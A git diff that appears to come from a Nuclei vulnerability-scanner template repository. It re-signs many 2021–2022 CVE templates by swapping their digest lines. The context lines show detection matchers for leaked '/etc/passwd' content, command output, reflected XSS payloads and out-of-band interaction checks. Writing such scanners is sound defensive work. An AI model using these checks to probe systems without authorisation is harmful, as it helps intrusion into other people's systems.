490a004630440220176fb89ec397b980e0ea26b87b815baa059d323de3337a8ec24e2e8c0a0cf15c02200bf16edd4b919cf25c6319ccc3019ee169d54b7a91c0c242d9465cdfa96f030f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index 2b65a83f4b..de935da98c 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068d48f3ed1b18a18f6d8a7aab9d329d2ef1ab59ae7975558fcc658030c86758602202beae5f2b5f2ef43937f43f3cbf3feb749df245d2e841fa8df5963b2c96ae819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210088cc9496c36425cadeb76ea850dad7bb090ed0a984a63d2b0e428b8b9c15d4c7022023a9097c12c361205278e5f91692f4ee708b673b2e5c2ae2fe9133245e8ccc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 806752d520..8772a96bbd 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -49,4 +49,4 @@ http: - 302 - 307 - 308 -# digest: 4a0a004730450220187cab3673d4b39970accee9e374de2fc3060696feb954fe8352f18749b67a180221008264d516349f0b29d618482b160d6aceca10d043f5bb2da941e4d0430c7b2bc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041a5bfe743ece67393de950b3147a79655a7b85ee8894afbf4efbdc69ce9875802206e5416d29b5b4f879bcd4ba617698831bafe87a57be4bea18453dedc8a9bb98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 5ff5f61408..acf814c089 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b06aa91e93fa728e8a41a045b2854161d0eb822d82d915ecb9f2687386c4dc5d022100de776ca073ce694c73466b106bbbffc3cb0ba13af341d8763ed46690e75822dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206de4940bcfbaeec3cfc158a834aa4d26dabf808d70cfb3d8828e7d6e479c6f620221008dcc9d93a7c83756d8908295da6244aff47e98b5e201bc83e46e9875ae7b7405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 368146cdc7..cfefaeac88 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7dc8f0dffb6a6773bdef50c0f724379ca714d56e958c6c43e4e62c5ffc62b1e022100817418a132a87c241bad381be7be975d287769f4d75e9b4956b0a201307e8322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f57ba66b5efa0d02b663aacc3cc75a860926d701b4dced4cb98484fe18728af02205b06b852f41886fed8171fbdbf43e4f4114eb6fb07688bde3f77d996a3da78b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 5fc3d34144..ac8ea39e8d 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017e40b46cbbaa8ee5f83e32d2c0e632634e3f663ad7c01d73fd33f979341f545022100baded2daac0b3fdf5ae7695dbe10f0d1dd9e1f1732db69b57acdf04317209f8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f51c32131f54757336dd8dbfc3c9b407b605a60b7031b50ab3bcd3766dfdc14022100c7707d27db0cd3a80abba289bded6cf51b5344c85e4e452d8b808ec28e5651b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 51c20778b8..00890242c8 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -74,4 +74,4 @@ http: - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output part: interactsh_request # digest: 4a0a0047304502204a840a21336953401491afca41b378a09a1f91d1a9ddcc3730006d76b55739e1022100daab695f729353f232cefc195d1664d48a955e22a6c539731cf0eecf2718fdb9:922c64590222798bb761d5b6d8e72950 -# digest: 4a0a0047304502204eb9ca6738093def1e2cc010f3df4e82705c0c43cfb3cb3425d5871d348515ac0221009e9fa7ca46f186fafcdc8dcea3de1b7d8ba9f549df7cac6f7aa9f127a9e4ba61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206bbc248c30ddbcce2c3bf459db4fe261ec0b250ecda209ee08c2a743e484fcbc022100b2e34ca642f580dce7cc489ab52e7c90d58c61407224d2c63e9264c35d912117:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 567d6543ce..5a1d2493a8 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -43,4 +43,4 @@ http: - ".*vpath.*" - "thinfinity" condition: and -# digest: 4b0a00483046022100c73959ff2e4102e8f006d70e29caa4b98cecf3ce80914939bd7da6557f41e6d7022100df8e6ecda681fa3485716ca7d2672281e07a53b82f6c4a3e3e023bb40bd29415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb84742ce2f98cb5dc9e3e6c941a2e2bf6b3f29a3f01b73885699170e1e40ef002206f2bbef6532d0eb5149236a1fada5da49ba3d92a8e601fb0f991e18a858c352b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45232.yaml b/http/cves/2021/CVE-2021-45232.yaml index e2b4786a79..d641dce0c5 100644 --- a/http/cves/2021/CVE-2021-45232.yaml +++ b/http/cves/2021/CVE-2021-45232.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022014b3e39d19a975739d881f2d173c53050a43a15247eef092bc780b944e70f735022100c14dab355b7a0757b760b95b2a0499f2bc8027dacbc8d90a7416268f7b9337a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027a897964026aebab54d105b9661c1c5ec7ff9f3cd89da2b6203bedbb09a0b2802205a20c9ceeac1c9b798e70174052c0a43c78b9691420a248137026b44288c2efe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index c01d93a1ec..9564be3d8b 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095fb129387d2b75f24feb79d00dc66407bed270925edc21aeb695b57da802aa3022100d997d277507209d0a025e2218c2163a0ee055aeaf4ac0bc3483b84243f1654af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d866b4bf394249189039df296942e181b1d17de0da9977db18eb26ca96e416bb022100e7e0b2ab0d85ca71feeadebfe223cfbfe8df03b957b24e56b5b6f8f5e25de82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 51e22bf04a..cd53d1b650 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022068316f007e113dc8f5ce8caa988eaceef8d1319bd87ee633a4601468df62f99c022100899fb7ae174b0f95a1e490e8d0c653245e1d6bb3a5598c41d1b0453029b41445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cd0273b0b4112a3101fe3bcfc0632d7d0e2030b68ecb66ca77a8fe879c63c2002206d979b7b19b1736268dcb83a8e0df7b58b84d3ac98cdd4a1c6886a485b64219e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 8df5882955..6f5e1a666f 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -53,4 +53,4 @@ http: - 'status_code_1 == 404 && status_code_2 == 201' - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' condition: and -# digest: 490a004630440220731289291f5a3ad0eb6d9188430902ac5c2ffc770aa6ca643ea9082b2322a88602200b155a601c9353a99db54628cab14b6d69a78a5b59adedca0dd9c7181b9ac3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202718554de68c4dfea45dd175d9bfc340ea2425b0a8462130ba0953be4c1e639a022100f1ddc7a753fcf66912b2e484b36bca1e71c869f04023b7686722e43a182521d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 1ebc42dac4..7aaf461e20 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -45,4 +45,4 @@ http: dsl: - "status_code_2 != status_code_1" condition: and -# digest: 4b0a00483046022100c598b609cefe9631f86f0c8ff40939dcfbcf242ba4f352a679b222f481f5a949022100a76b1a153f40e86920865464e993f07338988f50b21d250757313229c3617422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008200ee8e3932d388cd9c9a19d892c6ad5f51c3f48564a2cca1a4985648f3116d02202921b3e5bba285639c908776508b397c7d9b01bc8b72362eceab71436a311b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index f9a8f5f135..361c3b0407 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -122,4 +122,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022058af8fe6d1f9965ec14d7c6c5286a65a1d5f6af6b3e70654d97bc2c98d9a35440220479df42905d77ffeacca4e8be0dac74d2a6f8966118c684ba352512ec255b65e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022047d63f5826c9b9ceb59d9ed3139a6b530fae5726bf1418cdbe4decff91e8d22202201acab11fdc62c4bfed133b124241b997797189b54ce0170b7bc726d75cfd3b2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46069.yaml b/http/cves/2021/CVE-2021-46069.yaml index 15b04806cc..2a0006c50c 100644 --- a/http/cves/2021/CVE-2021-46069.yaml +++ b/http/cves/2021/CVE-2021-46069.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and -# digest: 4b0a00483046022100b9eec9a11d83c3326164d4964a0d88023fb2bddab0fd59c66accb4aba8ab2945022100c2a2c468b82f029867bdb551e31f91155c65447e06d9f4b1eb5e30b0187f786d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdfbccbe0028282fc3c2dbb564bcc6f9032c86fc9962d406721f143cbe4ca9d9022100b646da841b187e28551c31d240db040337c8b497445b34d75ab25d813b17fd62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46071.yaml b/http/cves/2021/CVE-2021-46071.yaml index 18308c9d1e..67e5f645cf 100644 --- a/http/cves/2021/CVE-2021-46071.yaml +++ b/http/cves/2021/CVE-2021-46071.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and -# digest: 490a0046304402203689cb6cc57186dbcb826dbab2fcc9fc6e9a875e79019b6098a67bc3c76cf393022049cce2da769d9c71050dfae4bf192726ad13c1a1e1103b5d2cfcced045920c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d33475afc2f11ebc93f0b40cf9f2e896d3b3926fd7028fd91c782c8b800941ff02206eaea5796b58ecb4bed9e8dd6fefb54f23ebb25a107d02722a791a5d95fac168:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46072.yaml b/http/cves/2021/CVE-2021-46072.yaml index 5990bc2b0f..214a4a9e8e 100644 --- a/http/cves/2021/CVE-2021-46072.yaml +++ b/http/cves/2021/CVE-2021-46072.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "\">")' condition: and -# digest: 4b0a00483046022100e8b65efddb508cbf3aea482ff31507e9e3e6641381236c36e6851fc1a5c0f8a002210087bc36a39fc2d5ed398850fea8102507d64ad1d975ee8126a309cc61e3d4c148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c04701a4a58a5af597cb699e2c6f8970129c3ad7949d35e5f7a6735762de4f59022077202ead6cc701c23b1f8071f6c27f8a376d9415d208aa9eda9f69db53060852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index dae8fc9b3a..da28a64a04 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -51,4 +51,4 @@ http: dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" -# digest: 4b0a00483046022100c1ca445ac180dadd1e69d6301530124c87c90f3887f499ff62a9465f50591b28022100f37355782797e70cf40f972fd4981b49a66ffd089bebabab6bfecbdaadb33ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220308e436f3812ee2c86e9a0dd3485b0c280de884f4dd058cf64998796bcee5b8f022100e8797ab16b58b8097467f492ff3289fa9a625c6ca05dfa7c2393afad27754b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index bde0d4f672..01d1a435ac 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -40,4 +40,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100fe20ab019ed58034ee55071247995bdc5687525b011466437637201e0749ff3802205e87f35806ee013166ad43614a8dd7b006b0a6c90e18152dc290cb27cf2cdacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070b8dbc3e128ddf0c0fbc3c6d633deff1f27d7b47267e4434d27f076fd057d480220559981b9ea86820937b6c3f92be3767cd232c32a81a80845b72d11c336c14688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 8e74158ab1..f171757e1b 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022064049b6475e2e1c07882c648bc6073d3b85330430ea220bc09d6d5ec2fd36c70022012cb029862b3e9280a675de1f035cadb03edc0183f3770249727c5ec29123b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f42531f553199accb345fbb738d65888d84a2c5938bb6c8960eba8d5ff4f54cc02207e67187126865a8f1e8297e0c7bdde57b31aebe284eb51692c08da5d6c8d1cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 850d47644c..450af2d9b2 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402205bdfc0b516bab2eb09958cee6aa1af03359a0a6ca4b9cde894d5bb42aa11eabf02200dd27a460f7dec5caff036c79e360bf8f119fdd8b550edd102497579a05b4bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f9cb8263cc4a340f2c356f27f694c4ccc555f88d31ea32a1d35e42387cbd5f2022100a66741c5bdf309e684c115d8ce0f88fd0202a7e11f8de10dca60c1ebd339d083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 15773d33ff..0631fadd06 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -46,4 +46,4 @@ http: - 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")' - 'contains(body_2, "{{randstr}}")' condition: and -# digest: 4b0a004830460221009d44d5515a4fb76835428d1562b0032a4103c4d052eb17b59fdef763909d3877022100984b2452c57cffdf5910bd10dc34369ff6d429649ab3225d2c2f08cb4b8ae011:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab0da40d59f1fe58d094affd1049fb5fddd02a3c3185bc017818f2502c4f1760022100c680b57f51a63b27f63a39b075843a9f7fb2a2f812184a2d6808386f2c65b5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index c539c1ff19..7ad2c0330a 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -49,4 +49,4 @@ http: - 'status_code_1 == 201 && status_code_2 == 204' - 'contains(server_1, "lighttpd")' condition: and -# digest: 4a0a00473045022100c226c1fb02ad38b6698fbaca5442c78e16857059ef713a16f411c95850c896370220138afd2c8d0ef04cbb746e6c3ec8ddbae0222a0a3b376bb97b192ca166060a7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100836f459243054ed4599e1a550348930f61760c782d08b4b777531b594cadf30602210092fc02dd2d5f6bdb18b684a79cbc91bd12d4c85f4bdb4a080e9c8f46d9ebdd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46422.yaml b/http/cves/2021/CVE-2021-46422.yaml index 3b3bfe8dce..5768c58dbf 100644 --- a/http/cves/2021/CVE-2021-46422.yaml +++ b/http/cves/2021/CVE-2021-46422.yaml @@ -51,4 +51,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a0046304402202cf5006fe50de8196c788f6260513296879638ade74bb41ece092fc0ca6b3d4902205091b956a64612033dca0ac0b60c00613584b52d7921e9568c260edace05d50f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d34c19cc3ff517e6929ddceaa6987ca8b1b9e84df462fbabff39b28205494f2022100e4f6215e29a91c4ec4400ec9b520219b232bef32f9b7a9376131d38b1a427af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index f1d576e1e3..51307d001c 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -49,4 +49,4 @@ http: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" -# digest: 4a0a004730450221009d270c5f4ca3ebb0ecffa66f1be4389e9dfea415dd3f34c629b79075cb63c8ed02200f56a6bd33139269c0e0c259baf2e964cc9fa165a986c54c00d8a929f10bc1be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f56f78cdf75e21107ee40468318d47fdcd9f03e1677885c3f34ffedf96d52c38022100cb63934ffb047fab79222824aecba25718240aaf3af82a3449485e672286a86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index e88a259ec2..235e91b304 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -59,4 +59,4 @@ http: regex: - uid=(\d+)\((\w+)\) part: body -# digest: 4a0a0047304502200c44eb70f9a64a32a520113de7752489c2a55bfe04ac78ab2aa36134bda2d664022100b46f6895973bac550934084fad2f74c8c2a6bec6bb1a93708c913c9b5201b0ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c48413ebe1c771ce04661c715f0d38a651b134d2eee3ec668769d473ec9bb29b02203c4793a9acb4f5bc01be66bd04d169007c3b8046d68d79073378e0e10ebba3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 92add31637..2291486a9a 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -44,4 +44,4 @@ http: part: body words: - "alert(document.cookie)" -# digest: 4b0a00483046022100e593d1ea8f11a2fda9ec11684b2de65075fb4cbc4d35af4986961bff299afd37022100b11d0e7dc901eda32e6a5b1f2958f5976f72bd1dd3cb87d7dbc29c05b8031a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c140ee61632dc67c9acc81a49ec451a15bb40801fed7f1b72d892508b42222ed022100e1b0b356f74b2f34f558cb407535b0fdecfbcdaaa934de641550cb0f2e1a290e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 250c628b96..5b497f8348 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0b5d5f12d52008c9ccd521518e2f2fb845eb33c8d7d16186a645196aaa992a8022100f6255a9089afad7aaf09d3929f440a647bba47d81b1c23abb31319d11f49a103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008927a3c87344d4a0c158cf096cff3d45db997215a9bd2f5cf76e780a63a744e40220101f5fa872293bad21f9addad3c75908539453fc4499807b8c4718a910f4ddd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index baf2ef667d..e4cf92c4df 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b170ba0c6ad3af42bd6f70aa404652b0e6a8213f3e4f81a152225e137fb949fa022042b2e76073edf8be64e0c79747b2e2791f3b6172349bdfc3bce8a1420a03fbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200dec39282fa7d200268b3764abd8fc15194b58ed4a1e2c91b3300d210f914adc022100ccd46fac156536cab2315c0fdb2a8d1d4af81d6fb48208beb1b011c48aca86c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index c1dcb36456..3503658ffd 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202e7a4ad224a01fb7e302b35a466effdce8c1ab91a0159ee0a5aa7e2f156ff75502210090a13e099a971610a1ffc1c1d6173e1e325a337b5ce510b4e8945c909b24b5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081ed1148acdd44ce4bbb4a3af21ffeda77b9194dc5b2a29d131bcb3812cb496a0220634c9d051f8eca2b28396a98f86e111ea610b2bd2252ef78a64389c7641827b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index be44aac08e..926621cf60 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068017ddf7be5c2400f46a248bf0c445ec579815b4c6c231d87159c6f45c0712b0220785740ea591c866890cc1f536916f20bce6fb31318c47a60128dc3532771ffef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022100e90f60406630b7ff81774b2c7df9d6f13402e885a0d3e9e0bc24938b6fcac163021f17ae4db2c847fd083d025aae7226bf57e2adc9a35187c510ce9ba587657cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index ea16ab5493..92319bb8f8 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cae85661ff90aec40fdee7df9ac8db1af2ce9aad8a6a63a8e22e4def5679581802207e903a6a0f9f17440e2ca63031003ad6350230998d0a6d1034c7d863b5d69ec4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af9edcd692d399d59f4ac310e4497715beac9fa92fec8cb90a04d9234c44b9c202200f8ab602cf5b277cfeb426e9e080e682f0c431588ae087a33608fd2c656c4210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index 4264c1b1e0..871144cf30 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce359a9aaf656f4bfb67f066d105d38949d5ee5e18d66309f7ceca33e7c169dc0220345570fe5a236b50b42090400eb8d83c35012b3950c2213aa348eac28720e16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022040eaca71c7a6d1560bfa719ef237433bdb23da9fe984caa9db3ff9548f1268b1022100e147e0d40c3e66583872096398debdcb61c857fd731bdd0944eeacf31643d80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 9545abdff7..3d724de03e 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)")' - 'contains(body_2, "newstatpress_page")' condition: and -# digest: 4a0a0047304502210099ba38d2af5fabba77de256d432356976787d01bec7be14985866d3919cb6325022004f0622bdf1358a7fbf7c834e1883c75e961896d6a8cbecece71ae8073714d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc4ee715424f4e18be9b98f4e753983931d231793d2df0aa0c17ef809eeb436d022006ef7498d8027fd3a7c7f082b3d01a7d73dec67c39c0ee573ff22cc8b7624484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index f78d344d6d..c3778d7d7f 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204d99748942fe5de5d793f3e6dc904384b07ce40bbebc0b307d8f555f9d9dac200221009799d6f7b38150935e23aa93324479053b5262ba9b382e11421446ad0b56b91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220536da7a9178440ec3a7c2a4f36c1a896c04d6c64781c14608dd8095926256709022100f9bc7e59ea6dd62ec9e0f0ea9b0b5ba10d0c57827b69e40b9de46b13c99db5e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 81611ca0d5..84547bef16 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -52,4 +52,4 @@ http: - 'contains_all(body_2, "first name", "last name", "email")' - 'contains(content_type_2, "application/octet-stream")' condition: and -# digest: 4a0a0047304502201f3b08635497a42da9ed7bbf4edd82a7ec1a6856e83206c033a439576f7d839d022100ea25838ab24822ecbfb1aa15ec89ac82b3243f4347222c85b9f933e0693d6954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e47ac805de175bc32661b1b254018da773b76d377655e776ffd17c5bd1c2c69b0220576195e2b3c34fade0a82a5eda6b7a9ee898580086ba151d8eeb0d5112c9b816:922c64590222798bb761d5b6d8e72950 \ No newline at end of 